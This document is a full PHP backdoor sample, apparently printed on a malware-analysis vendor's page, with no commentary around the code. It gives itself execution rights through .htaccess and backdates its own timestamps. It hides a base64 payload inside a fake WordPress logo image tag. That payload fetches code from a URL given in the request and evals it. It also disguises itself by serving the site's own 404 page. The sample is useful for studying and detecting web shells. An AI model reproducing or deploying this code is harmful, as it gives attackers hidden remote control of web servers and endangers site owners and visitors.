// Silence is golden.
error_reporting(null);
ini_set("display_errors", 0);
$file_contents =
"<FilesMatch \".(ph|phtml|php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>";
$create_htacess = @fopen(".htaccess", "w");
if ($create_htacess) {
fwrite($create_htacess, $file_contents);
fclose($create_htacess);
chmod(".htaccess", 0444);
chmod(basename($_SERVER["PHP_SELF"]), 0444);
}
function login_shell()
{
$random_url = "404NotFound";
$curl = curl_init();
$protocol = "http://";
if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] != "off") {
$protocol = "https://";
}
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt(
$curl,
CURLOPT_USERAGENT,
"Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_FRESH_CONNECT, true);
curl_setopt(
$curl,
CURLOPT_URL,
$protocol . $_SERVER["HTTP_HOST"] . "/" . $random_url
);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$server_404 = curl_exec($curl);
$server_404 = str_replace(
"/{$random_url}",
$_SERVER["SCRIPT_NAME"],
$server_404
);
$server_404 = str_replace(
"{$random_url}",
$_SERVER["SCRIPT_NAME"],
$server_404
);
echo $server_404;
}
function utf8key($input)
{
$keyStr =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
do {
$enc1 = strpos($keyStr, substr($input, $i++, 1));
$enc2 = strpos($keyStr, substr($input, $i++, 1));
$enc3 = strpos($keyStr, substr($input, $i++, 1));
$enc4 = strpos($keyStr, substr($input, $i++, 1));
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr((int) $chr1);
if ($enc3 != 64) {
$output = $output . chr((int) $chr2);
}
if ($enc4 != 64) {
$output = $output . chr((int) $chr3);
}
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
} while ($i < strlen($input));
return urldecode($output);
}
function pre_term_name($auth_data)
{
$filendate = scandir(getcwd());
if (!is_dir($filendate[1])) {
touch(".htaccess", filemtime($filendate[1]));
touch(__FILE__, filemtime($filendate[1]));
touch(".htaccess", filemtime($filendate[1]));
} elseif (file_exists($filendate[1]) && $filendate[1] == __FILE__) {
touch(__FILE__, filemtime($filendate[3]));
touch(".htaccess", filemtime($filendate[1]));
} elseif (file_exists($filendate[1])) {
touch(__FILE__, filemtime($filendate[1]));
touch(".htaccess", filemtime($filendate[1]));
}
$kses_str = str_replace(["%", "#"], ["/", "+"], $auth_data);
return @utf8key($kses_str);
}
if (function_exists("curl_exec")) {
if (!isset($_GET["url"])) {
login_shell();
}
}
$wp_default_logo =
'<img src="data:image/png;ZXJyb3JfcmVwb3J0aW5nKCAwICk7DQoNCmZ1bmN0aW9uIF91cmxfZ2V0X2NvbnRlbnRzICgkdXJsKSB7DQogICAgaWYgKCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfZXhlYycpICl7IA0KICAgICAgICAkY3VybF9jb25uZWN0ID0gY3VybF9pbml0KCAkdXJsICk7DQoNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX1VTRVJBR0VOVCwgIk1vemlsbGEvNS4wKFdpbmRvd3MgTlQgNi4xOyBydjozMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzMyLjAiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIDApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX0NPT0tJRUpBUiwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfQ09PS0lFRklMRSwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIA0KICAgICAgICAkY29udGVudF9kYXRhID0gY3VybF9leGVjKCAkY3VybF9jb25uZWN0ICk7DQogICAgfQ0KICAgIGVsc2VpZiAoIGZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSApIHsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCAkdXJsICk7DQogICAgfQ0KICAgIGVsc2Ugew0KICAgICAgICAkaGFuZGxlID0gZm9wZW4gKCAkdXJsICwgInIiKTsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IHN0cmVhbV9nZXRfY29udGVudHMoICRoYW5kbGUgKTsNCiAgICB9DQogICAgICAgIA0KICAgIHJldHVybiAkY29udGVudF9kYXRhOw0KfQ0KDQokY29udGVudF9vdXRwdXQgPSBfdXJsX2dldF9jb250ZW50cygkX0dFVFsndXJsJ10pOw0KZXZhbCAoJz8#JyAuICRjb250ZW50X291dHB1dCk7">';
preg_match('#<img src="data:image/png;(.*)">#', $wp_default_logo, $logo_data);
$logo_image = $logo_data[1];
$wpautop = pre_term_name($logo_image);
if (isset($wpautop)) {
$preg_import =
"create_function";
$preg_import("", "}" . $wpautop . "//");
}
© 2023 Quttera Ltd. All rights reserved.